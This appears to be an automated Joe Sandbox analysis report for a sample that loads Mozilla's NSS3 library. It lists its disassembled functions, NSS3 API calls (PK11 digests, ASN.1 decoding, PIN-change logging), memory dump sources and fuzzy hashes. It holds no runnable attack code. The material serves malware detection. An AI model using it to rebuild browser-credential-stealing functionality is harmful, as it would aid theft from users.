                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                          • API String ID: 977052965-1032500510
                                                                                          • Opcode ID: 54cfdbcf38a1c3427627f6f7c571e2d33effa66ec93c82471e4217a4ff9c0fc7
                                                                                          • Instruction ID: 2afe0a62a75c0b8950e5f74c38e7c63db0f3fd044d943c4fa2c613a2693037c7
                                                                                          • Opcode Fuzzy Hash: 54cfdbcf38a1c3427627f6f7c571e2d33effa66ec93c82471e4217a4ff9c0fc7
                                                                                          • Instruction Fuzzy Hash: 1C61AFB5D001459FDF10CF56CC80AAFBBB9EF85358F144529DC29A7700E736A925CBA1
                                                                                          Function 6CB48E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB48E5B
                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6CB48E81
                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB48EED
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CC718D0,?), ref: 6CB48F03
                                                                                          • PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CB48F19
                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6CB48F2B
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB48F53
                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB48F65
                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6CB48FA1
                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6CB48FFE
                                                                                          • PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CB49012
                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6CB49024
                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6CB4902C
                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6CB4903E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                          • String ID: security
                                                                                          • API String ID: 3512696800-3315324353
                                                                                          • Opcode ID: 765afea0a6ad669dc3a7722dba922c4b5847d29e281827057ee018d59333bde2
                                                                                          • Instruction ID: 42bbdbb786e064257e5a556af1f3abdd123b41ad97f1db10384c362573f9493b
                                                                                          • Opcode Fuzzy Hash: 765afea0a6ad669dc3a7722dba922c4b5847d29e281827057ee018d59333bde2
                                                                                          • Instruction Fuzzy Hash: C2514AB150C380ABD7109A99DC40FAF33A8EB8575CF44482EF998D7B44E732D8099793
                                                                                          Function 6CB74E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CB74E83
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB74EB8
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB74EC7
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB74EDD
                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CB74F0B
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB74F1A
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB74F30
                                                                                          • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CB74F4F
                                                                                          • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CB74F68
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
                                                                                          • API String ID: 1003633598-3530272145
                                                                                          • Opcode ID: 4813249ed9b227b8bf53c44bf4fef29472629b177ce18c03f0565d606cbf6521
                                                                                          • Instruction ID: 25e16103fd02bcf5ac2dacd4167c79d128a0db09b6fb620e285cc133e0bd8600
                                                                                          • Opcode Fuzzy Hash: 4813249ed9b227b8bf53c44bf4fef29472629b177ce18c03f0565d606cbf6521
                                                                                          • Instruction Fuzzy Hash: E941E371601194AFDB108B51EE8CF9E37B5EB4231EF444024F91D9BA11EB309D59CFA2
                                                                                          Function 6CB74CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CB74CF3
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB74D28
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB74D37
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB74D4D
                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CB74D7B
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB74D8A
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB74DA0
                                                                                          • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CB74DBC
                                                                                          • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CB74E20
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                          • API String ID: 1003633598-3553622718
                                                                                          • Opcode ID: 230d9cd0449c67121bc889cfb6ffa328383d9ebc07b2f9a5dd84d8afc7627c25
                                                                                          • Instruction ID: bec375c420575315de9f2be3dc86f459017503b0146f03e0fe587a162769ef4c
                                                                                          • Opcode Fuzzy Hash: 230d9cd0449c67121bc889cfb6ffa328383d9ebc07b2f9a5dd84d8afc7627c25
                                                                                          • Instruction Fuzzy Hash: 2941D471600164AFDB109B55EE9CBAE3775EB4230EF444024FD19ABA11EB309D59CF62
                                                                                          Function 6CB72F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_SetPIN), ref: 6CB72F26
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB72F54
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB72F63
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB72F79
                                                                                          • PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6CB72F9A
                                                                                          • PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6CB72FB5
                                                                                          • PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6CB72FCE
                                                                                          • PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6CB72FE7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
                                                                                          • API String ID: 1003633598-3716813897
                                                                                          • Opcode ID: 9efef6885c8f3cf64d0e3dc3a985ed67c30d0407113460dc93037d7427f2f441
                                                                                          • Instruction ID: 48506e26ecfe1308033e3dfb735f6d945400bc8d3bde009283d8111985378c99
                                                                                          • Opcode Fuzzy Hash: 9efef6885c8f3cf64d0e3dc3a985ed67c30d0407113460dc93037d7427f2f441
                                                                                          • Instruction Fuzzy Hash: 6F31D475A01194EFCF108B55ED4CE8E3BB1EB4630DF884014ED19AB611EB309959CB62
                                                                                          Function 6CC0CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC0CC7B), ref: 6CC0CD7A
                                                                                            • Part of subcall function 6CC0CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CB7C1A8,?), ref: 6CC0CE92
                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC0CDA5
                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC0CDB8
                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6CC0CDDB
                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC0CD8E
                                                                                            • Part of subcall function 6CB305C0: PR_EnterMonitor.NSS3 ref: 6CB305D1
                                                                                            • Part of subcall function 6CB305C0: PR_ExitMonitor.NSS3 ref: 6CB305EA
                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CC0CDE8
                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC0CDFF
                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC0CE16
                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC0CE29
                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6CC0CE48
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                          • API String ID: 601260978-871931242
                                                                                          • Opcode ID: 516a4855d044a8988c82a7c1357e92255efaff3475c7d2aa266c5d2cb797518a
                                                                                          • Instruction ID: 84feebf64bea1b9a6058c46c18a2be25c8fb43cbe41b760febe434db107067e5
                                                                                          • Opcode Fuzzy Hash: 516a4855d044a8988c82a7c1357e92255efaff3475c7d2aa266c5d2cb797518a
                                                                                          • Instruction Fuzzy Hash: DF11D6B6F0227156DB11AAB97C14A9E3978DF0224CF181534E819D2F41FB22C908C7F3
                                                                                          Function 004112B0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcessstrtok_s
                                                                                          • String ID: block
                                                                                          • API String ID: 3407564107-2199623458
                                                                                          • Opcode ID: da2563823ec1a76d62d5fd62df77ffe8bebd7261cb24a53a2c094a3147348de1
                                                                                          • Instruction ID: b2aee4bd772402993bd8daf8ed4e127407cef198cc172b88b11a84757ccddcb3
                                                                                          • Opcode Fuzzy Hash: da2563823ec1a76d62d5fd62df77ffe8bebd7261cb24a53a2c094a3147348de1
                                                                                          • Instruction Fuzzy Hash: 6451A574B00209EFDB14DFA0E944BEE37B5BF44B04F10804AE916A7361D778D996CB5A
                                                                                          Function 6CBA6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CC71DE0,?), ref: 6CBA6CFE
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBA6D26
                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CBA6D70
                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6CBA6D82
                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6CBA6DA2
                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBA6DD8
                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CBA6E60
                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CBA6F19
                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6CBA6F2D
                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CBA6F7B
                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBA7011
                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6CBA7033
                                                                                          • free.MOZGLUE(?), ref: 6CBA703F
                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CBA7060
                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CBA7087
                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CBA70AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                          • String ID:
                                                                                          • API String ID: 2108637330-0
                                                                                          • Opcode ID: 8bfd9253993ac39af361da893e4505d826664ff9ed2baaedecefe7b36673ebcd
                                                                                          • Instruction ID: b9d20461b37e494993cce79dcec06117a1e9c8ac8c17d1e9b3f8d3a833ca03d1
                                                                                          • Opcode Fuzzy Hash: 8bfd9253993ac39af361da893e4505d826664ff9ed2baaedecefe7b36673ebcd
                                                                                          • Instruction Fuzzy Hash: 39A1F7F190C2C09BEB108BA8DC45B5E32A4DB8530CF244939E9D9DBA81F775D84A8793
                                                                                          Function 6CB6AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(?,?,?,6CB4AB95,00000000,?,00000000,00000000,00000000), ref: 6CB6AF25
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6CB4AB95,00000000,?,00000000,00000000,00000000), ref: 6CB6AF39
                                                                                          • PR_Unlock.NSS3(?,?,?,6CB4AB95,00000000,?,00000000,00000000,00000000), ref: 6CB6AF51
                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CB4AB95,00000000,?,00000000,00000000,00000000), ref: 6CB6AF69
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB6B06B
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB6B083
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB6B0A4
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB6B0C1
                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6CB6B0D9
                                                                                          • PR_Unlock.NSS3 ref: 6CB6B102
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB6B151
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB6B182
                                                                                            • Part of subcall function 6CB9FAB0: free.MOZGLUE(?,-00000001,?,?,6CB3F673,00000000,00000000), ref: 6CB9FAC7
                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CB6B177
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CB4AB95,00000000,?,00000000,00000000,00000000), ref: 6CB6B1A2
                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6CB4AB95,00000000,?,00000000,00000000,00000000), ref: 6CB6B1AA
                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CB4AB95,00000000,?,00000000,00000000,00000000), ref: 6CB6B1C2
                                                                                            • Part of subcall function 6CB91560: TlsGetValue.KERNEL32(00000000,?,6CB60844,?), ref: 6CB9157A
                                                                                            • Part of subcall function 6CB91560: EnterCriticalSection.KERNEL32(?,?,?,6CB60844,?), ref: 6CB9158F
                                                                                            • Part of subcall function 6CB91560: PR_Unlock.NSS3(?,?,?,?,6CB60844,?), ref: 6CB915B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                          • String ID:
                                                                                          • API String ID: 4188828017-0
                                                                                          • Opcode ID: 8dd8e0f0756640aa97645dd0e0e0d4ae6888c596cfaef84d14629c5d7d4dda3a
                                                                                          • Instruction ID: 43ec0af47b9b854c3348947be343fe88c067c18ab8e4a12f2ad8d4b35dd88c37
                                                                                          • Opcode Fuzzy Hash: 8dd8e0f0756640aa97645dd0e0e0d4ae6888c596cfaef84d14629c5d7d4dda3a
                                                                                          • Instruction Fuzzy Hash: E6A1B0B1D00245AFEF009FA5DC45BEEBBB4EF09308F144124E909A7B51E731E959CBA2
                                                                                          Function 6CBBAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBBADB1
                                                                                            • Part of subcall function 6CB9BE30: SECOID_FindOID_Util.NSS3(6CB5311B,00000000,?,6CB5311B,?), ref: 6CB9BE44
                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CBBADF4
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CBBAE08
                                                                                            • Part of subcall function 6CB9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC718D0,?), ref: 6CB9B095
                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBBAE25
                                                                                          • PL_FreeArenaPool.NSS3 ref: 6CBBAE63
                                                                                          • PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CBBAE4D
                                                                                            • Part of subcall function 6CAC4C70: TlsGetValue.KERNEL32(?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4C97
                                                                                            • Part of subcall function 6CAC4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4CB0
                                                                                            • Part of subcall function 6CAC4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAC3921,6CCA14E4,6CC0CC70), ref: 6CAC4CC9
                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBBAE93
                                                                                          • PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CBBAECC
                                                                                          • PL_FreeArenaPool.NSS3 ref: 6CBBAEDE
                                                                                          • PL_FinishArenaPool.NSS3 ref: 6CBBAEE6
                                                                                          • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBBAEF5
                                                                                          • PL_FinishArenaPool.NSS3 ref: 6CBBAF16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                          • String ID: security
                                                                                          • API String ID: 3441714441-3315324353
                                                                                          • Opcode ID: 2a7d6a7dcefac81e54ff5efe40819803c949ccdb54553fa3f994cb0a86773ba1
                                                                                          • Instruction ID: 611c0d5f9f9ff50f39966cbab1d13c998dd6295b8cc09f11007e8e18e82af0b8
                                                                                          • Opcode Fuzzy Hash: 2a7d6a7dcefac81e54ff5efe40819803c949ccdb54553fa3f994cb0a86773ba1
